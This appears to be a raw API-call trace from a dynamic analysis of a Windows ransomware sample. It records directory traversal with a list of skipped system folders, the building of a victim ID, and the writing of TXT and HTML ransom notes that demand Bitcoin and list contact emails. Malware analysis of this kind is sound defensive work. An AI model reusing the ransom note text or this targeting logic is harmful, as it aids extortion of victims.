	[0169.754] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="application data") returned 0x0
	[0169.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.755] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="winnt") returned 0x0
	[0169.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.755] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="tmp") returned 0x0
	[0169.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.755] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="cache") returned 0x0
	[0169.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.756] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="temporary internet files") returned 0x0
	[0169.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.756] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="webcache") returned 0x0
	[0169.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.756] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="inetcache") returned 0x0
	[0169.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.756] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="nvidia") returned 0x0
	[0169.757] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.757] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="packages") returned 0x0
	[0169.757] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.757] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="cookies") returned 0x0
	[0169.757] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.757] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\*.*", lpSrch="programdata") returned 0x0
	[0169.758] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0169.758] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0169.758] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7eb34775, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0169.758] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0169.758] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7eb34775, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7eb34775, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7eb5d28d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0169.758] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7eae80e5, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7eae80e5, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7eb34775, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0169.758] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7eae80e5, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7eae80e5, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7eb34775, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0169.758] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0169.759] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0169.767] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoftLandingStage", cAlternateFileName="SOFTLA~2")) returned 0
	[0169.767] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0169.767] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0169.768] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DRM", cAlternateFileName="")) returned 1
	[0169.768] lstrcmpW (lpString1="DRM", lpString2="..") returned 1
	[0169.768] lstrcmpW (lpString1="DRM", lpString2=".") returned 1
	[0169.768] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0169.768] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0169.768] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="DRM" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM") returned="C:\\Users\\All Users\\Microsoft\\DRM"
	[0169.769] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\DRM" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM") returned="C:\\Users\\All Users\\Microsoft\\DRM"
	[0169.769] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DRM", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\") returned="C:\\Users\\All Users\\Microsoft\\DRM\\"
	[0169.769] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\DRM\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\") returned="C:\\Users\\All Users\\Microsoft\\DRM\\"
	[0169.769] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\*.*") returned="C:\\Users\\All Users\\Microsoft\\DRM\\*.*"
	[0169.769] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\*.*" (normalized: "c:\\users\\all users\\microsoft\\drm\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0169.770] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\DRM\\*.*") returned 36
	[0169.770] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0169.770] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\*.*", cchLength=0x24 | out: lpsz="c:\\users\\all users\\microsoft\\drm\\*.*") returned 0x24
	[0169.770] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.770] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="windows") returned 0x0
	[0169.771] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.771] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="boot") returned 0x0
	[0169.771] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.771] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="system volume information") returned 0x0
	[0169.771] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.771] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0169.772] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.772] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="temp") returned 0x0
	[0169.772] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.772] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="program files") returned 0x0
	[0169.772] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.772] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="program files (x86)") returned 0x0
	[0169.773] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.773] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="appdata") returned 0x0
	[0169.773] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.773] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="application data") returned 0x0
	[0169.773] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.773] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="winnt") returned 0x0
	[0169.774] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.774] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="tmp") returned 0x0
	[0169.774] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.774] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="cache") returned 0x0
	[0169.774] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.774] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="temporary internet files") returned 0x0
	[0169.774] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.941] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="webcache") returned 0x0
	[0169.941] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.942] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="inetcache") returned 0x0
	[0169.942] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.942] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="nvidia") returned 0x0
	[0169.942] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.942] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="packages") returned 0x0
	[0169.942] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.943] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="cookies") returned 0x0
	[0169.943] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.943] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="programdata") returned 0x0
	[0169.943] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0169.943] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Server", cAlternateFileName="")) returned 1
	[0169.943] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Server", cAlternateFileName="")) returned 0
	[0169.943] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0169.944] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0169.944] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\DRM" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM") returned="C:\\Users\\All Users\\Microsoft\\DRM"
	[0169.944] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DRM", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\*.*") returned="C:\\Users\\All Users\\Microsoft\\DRM\\*.*"
	[0169.944] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0169.945] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0169.945] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\DRM\\HELP_DECRYPT_YOUR_FILES.TXT") returned 60
	[0169.945] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\drm\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0169.946] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0169.946] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0169.950] CloseHandle (hObject=0x384) returned 1
	[0169.951] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0169.951] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0169.952] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0169.953] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0169.953] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\drm\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0169.953] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0169.954] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0169.954] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0169.954] CloseHandle (hObject=0x384) returned 1
	[0169.955] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0169.955] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0169.955] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0169.955] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\DRM\\HELP_DECRYPT_YOUR_FILES.HTML") returned 61
	[0169.955] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\drm\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0169.956] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0169.956] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0169.959] CloseHandle (hObject=0x384) returned 1
	[0169.960] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0169.960] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0169.961] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0169.961] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0169.962] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0169.964] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\drm\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0169.964] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0169.964] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0169.964] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0169.965] CloseHandle (hObject=0x384) returned 1
	[0169.965] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\*.*" (normalized: "c:\\users\\all users\\microsoft\\drm\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7ed4a7c1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0169.966] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\DRM\\*.*") returned 36
	[0169.966] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0169.966] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\*.*", cchLength=0x24 | out: lpsz="c:\\users\\all users\\microsoft\\drm\\*.*") returned 0x24
	[0169.966] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.966] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="windows") returned 0x0
	[0169.966] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.967] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="boot") returned 0x0
	[0169.967] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.967] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="system volume information") returned 0x0
	[0169.967] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.967] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0169.967] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.968] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="temp") returned 0x0
	[0169.968] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.968] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="program files") returned 0x0
	[0169.968] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.968] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="program files (x86)") returned 0x0
	[0169.968] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.968] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="appdata") returned 0x0
	[0169.969] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.969] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="application data") returned 0x0
	[0169.969] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.969] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="winnt") returned 0x0
	[0169.969] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.969] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="tmp") returned 0x0
	[0169.969] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.970] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="cache") returned 0x0
	[0169.970] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.970] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="temporary internet files") returned 0x0
	[0169.970] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.970] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="webcache") returned 0x0
	[0169.970] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
